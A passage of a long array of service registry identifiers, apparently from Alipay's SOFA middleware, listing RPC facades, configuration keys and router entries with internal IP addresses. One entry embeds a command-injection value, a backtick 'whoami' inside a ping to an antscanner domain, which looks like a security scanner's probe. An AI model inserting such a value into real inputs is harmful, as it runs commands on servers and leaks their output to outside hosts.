NSTANCE_ID#@#SOFA.CONFIG","com.alipay.inshealthprod.facade.HealthPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.144.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.core.service.promocore.LotteryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.app.GroupSendServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.InvitationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openhome_commonAppAuditPolicyCalculationCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custprod.service.api.RegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbasset.common.service.facade.stuff.api.ScavengingRecognitionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.a#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:yuemaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.huntshadow.HsOperatorLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.custompage.CustomPageInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.BudgetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.PrizeInfoCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ValidationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.investtrade.facade.api.security.SecurityDealOtherRightsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.publishing.common.facade.publish.PublishSpi:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imtmsvcprod.common.service.facade.edu.SchoolRollServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.UserLoanRealIncomeRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExRateCodeConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.autodrive.AutoPayConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.prod.SecProdOperatorStorage:1.0:externSecProdOperatorStorage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.creditusage.CreditUsageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zimtmsvcprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.censor.config.CensorAuthorityManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardsales.common.service.facade.PcardShopFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.dk.DkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.guidepage.GuidePageRecommendInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:mydds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetBindRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenterprod.facade.AcquireQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.batch.engine.sdk.service.DagService:1.0:batchEngineDagService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprod.common.service.facade.FundGoldAssetProfitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.216.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_GOTONE_CACHE_REFRESH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.96.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dchainprod.common.facade.query.ReceivableViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.card.BackstageCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.fundQueryOrderDetailConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:sdaota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-happyaakoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.activityConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.cds.facade.ContentProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleDtbInitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryVideoExpansionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sccore.facade.AntStaffConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.PrizeDefinitionQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ping `whoami`33024869-uniqueId-104003028.antscanner.global.alipay.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ipwhitelist.IpWhiteListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bremng.common.service.facade.RuleDeployAccessor:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanrepay.common.service.facade.service.lock.LockServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:storeComplainConsult@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.util.config.ServerConfig.env,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nearbyshopbase.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finpdcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.biz.manager.service.MctPolymerizationPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ScheduleModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.fixedInvestmentTaskConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-fincoretechdss-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:developerops_ops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.biz.service.api.inner.WithdrawSubmitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.transin.YebsLightAutoTransInGuideService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-21#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.195.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.common.service.integration.mobilesearch.GlobalSearchFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfiprod.common.service.facade.rfm.contract.service.RfmContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopprodCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.tbase.customerv2.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:findecisionTaskCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antgraph.facade.GraphSimulationTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantPageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.MarketUnionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.apppackage.PackageManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyDbTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng_priceTemplateAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.insbffwebTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudnet.facade.callback.UniformCallbackFacade:1.0:jiuzhou@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.device.facade.IotDevicePrincipalWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.process.common.service.facade.BPProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.yqcore.common.service.facade.api.MobileCodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.whiteCmdExpressions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.PlatformReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.core.service.repository.quotation.TrendRepository:1.0:memoryCachedTrendRepository@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.subscribe.api.SubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.MaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:fincorecheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.component.DynamicCodeCompShowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.AdumpManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.ITransReceiverService:1.0:iopengw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudcore.riskservice.callback.OpsChngRiskServiceCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.servicelibrary.ServiceLibraryQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:uemprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstm.common.service.facade.unifiedasset.view.AssetUnifiedViewMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tbfinfra@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.onestop.service.facade.OnestopLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.customasset.facade.CustomAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_BAITIAO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fporgassetfinancing.common.service.facade.api.FinServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicIndexManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.BlockchainApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.workflow.common.service.facade.feedback.UserFeedbackEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductOfferFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.ContractSendMsgDrmResource.enableSendMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.facade.finfoappstore.ProdDefService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.metadatacenter.facade.api.AppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dms.common.service.DmsExecutionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.facade.ProdRelationConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.218.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxrouter.common.service.facade.api.FluxCapacityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","kbasset@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.243.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.SymbolRiskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.tlou.TlouWufuPersonEntityRelationEntitySideDbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcaudit.facade.RcauditCallback:1.0:testUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.ModifyMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.biz.donate.Donate4WalkManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.giftprod.common.config.drm.wufu2020.ActivityTaskDrm.whiteUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.247.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mappprod.common.service.facade.appuser.MerchantAppUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.SpOperatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressionRuleMngNewQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.EbppChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.opendata.common.service.facade.TopologyInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadamodel.common.service.facade.api.DomainServiceExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventcomputeversion.EventComputeVersionOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIJobProcessor:1.0:ciYamlJobProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.157.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopcenter.common.service.facade.api.LeadsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.110.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.160.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_DBACKPRODRECEIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:pledgecoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.service.integration.baoxianquery.InsPolicyQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.account.OfficialAccountRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudnet.facade.common.network.service.LBManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:zmschedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.plugin.message.antq.drm.AntqPublisherManager.sendLoadTestMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exriskcenter.common.service.facade.api.query.ExPredictTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.EtcPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.reachshop.ShopItemManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","punishcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.26.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyorg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.moonlight.api.MlctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FundPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodcore.service.api.product.PscPdConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.FundPoolLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:tsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundprod.common.service.facade.FundUserOptionalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.huanyu.facade.change.ChangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.chaos.dig.facade.code.api.CiAttackApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inschainproc.common.service.facade.api.InsSupervisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.autoShareMaxPage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundguard.facade.api.gray.FgGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.open.api.alarm.DkAlarmUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sessionzdalapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.extension.InstExtensionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.api.ApiresAppApiManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.AntPassTrustLoginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.MerchandiseOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.CreditInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.ebill.facade.EbillQueryRzoneServiceV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ProdExternalCompService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:mrchiscoreob@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.marketpage.api.MarketPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.client.service.InsGatewayExterfaceInvokeService:1.0:insusercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:overseaexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imtmsvcprod.common.service.facade.config.CommonConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_uct#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.papers.PapersCommonCardAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","inslifeprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.chargefront:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundguardian.common.facade.service.InsuranceCallbackFacade:1.0:finfundtaskcenterInsuranceCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forum.api.ForumInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.TaskQueryService:1.0:yebbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:dingtalkAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.smartcall.SmartcallInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.reyInvoiceTaskCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngFactoringCreditInfoCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.common.service.facade.client.ParamClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.d